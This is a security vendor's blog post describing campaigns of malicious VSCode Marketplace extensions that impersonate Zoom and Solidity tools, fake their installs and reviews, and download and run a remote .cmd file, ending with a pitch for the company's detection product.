VSCode Extension Trivia: Real or Cake?
It’s me again. It has been a few months since the latest blog post that went quite viral — “How We Hacked Multi-Billion Dollar Companies in 30 Minutes Using a Fake VSCode Extension”, and by now you should have guessed that if you are reading this we’ve probably found some more distressing stuff to share! Yay.
Microsoft Visual Studio Code, is rightfully the most popular IDE in the world. It is amazing and I take my hat off to the work that Microsoft has done with it. But, when it comes to popularity, with all good comes the bad.
In the past few months, since our latest research blog, we’ve detected a couple of ongoing campaigns against the VSCode Marketplace that have impacted thousands of organizations.
The first and most sophisticated campaign begins with Is it real, or is it cake?
Let the games begin
Lets play a game, below you’ll find a screenshot of the Zoom VSCode extension marketplace listing page —
Now, I want you to tell me, is it real or is it cake?
Looking closely, you can see it has several great indicators for it being real, the high number of installs, the official Zoom Github repo, the positive reviews. Going into the publisher page we continue to get positive reinforcements —
The domain name looks great, it has the official support email, it has all the official socials, everything checks out.
Except, what you are looking at is an info-stealing campaign that has been plaguing the VSCode marketplace in the last 2 months. It is cake.
When deobfuscating, researching, and diving into the extension code you can find it downloads a .cmd
file from a Russia-based endpoint, and spawns a child process on the machine executing this .cmd
file. Bad stuff.
Unfortunately, at the marketplace listing level, the only indicator that this might be a non-legitimate extension is the fact that the publisher’s domain is not verified. The sad part is that less than 7% of the extensions in the VSCode marketplace have a verified publisher, even the most popular and widely used ones are more often than not, unverified. So you cannot rely on this indicator to tell if this extension is real or cake.
You mentioned this is a campaign, what has been happening?
Well, Zoom’s example is unfortunately not the only one. There have been over 6 similar cases in the past two months, where the extensions seem completely real and the threat actor has managed to fake installs and reviews, while executing remote code on the infected machines.
Total installs: 7,727,820 (Some installs may have been faked, but by looking at the rate of installs we also know at least thousands were infected)
First seen: September 30th
Here are some of the most popular extensions, all from the same campaign:
Solidity for Ethereum Language — Link to ExtensionTotal’s risk page
Solidity (Ethereum) — Link to ExtensionTotal’s risk page
Zoom Workspace — Link to ExtensionTotal’s risk page
Zoom — Link to ExtensionTotal’s risk page
Blockchain-Toolkit — Link to ExtensionTotal’s risk page
The traits are very similar, and here at ExtensionTotal, we’ve had a 100% detection rate for all of these cake extensions as soon as they were published to the marketplace thanks to our risk model.
So what is there besides cake?
Cakes are not all we get. There has been a couple other less prominent campaigns impacting the marketplace that were not trying to mask as popular extensions, but instead just pretend to have functionality that developers may want —
A publisher by the name of “498”, has published 4 different malicious extensions on the marketplace which within 10 days were installed by over 4,500 developers. Unfortunately this is a very common occurrence we detect at ExtensionTotal, malicious extensions which even after being reported, stay on the marketplace for a few weeks before finally being removed by Microsoft. This is one of the reasons we recommend all our enterprise customers who leverage our product, to create a policy that prevents installation of extensions with low installs through our enterprise firewall offering.
Here are some of the malicious extensions detected in this and similar campaigns —
VoiceMod — Link to ExtensionTotal’s risk page
Python Format + Lint: Formatter and … — Link to ExtensionTotal’s risk page
C++ Playground: Inline REPL, Compil… — Link to ExtensionTotal’s risk page
C/C++ Format: Astyle Code Formatter — Link to ExtensionTotal’s risk page
HTTP Format — Formatter for plaint … — Link to ExtensionTotal’s risk page
Better Psalm Docker VS Code — Link to ExtensionTotal’s risk page
Total installs: 47,253
So bottom line, what can I do?
Well, you can stop eating cake all together and block all extensions. The issue with that is that everyone loves cake. Blocking all extensions is a sure-fire way to kill the productivity of the organization. This is a classic problem with software supply chain that we meet every day in large enterprises, in VSCode, and other software provisioning channels like Browsers, OS Packages, Code Packages and more, how do you balance security and productivity? We’ve built ExtensionTotal to do just that, for practitioners and enterprises alike.
Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.
If you’d like to chat, hit us up here 🤙
— Amit Assaraf, CEO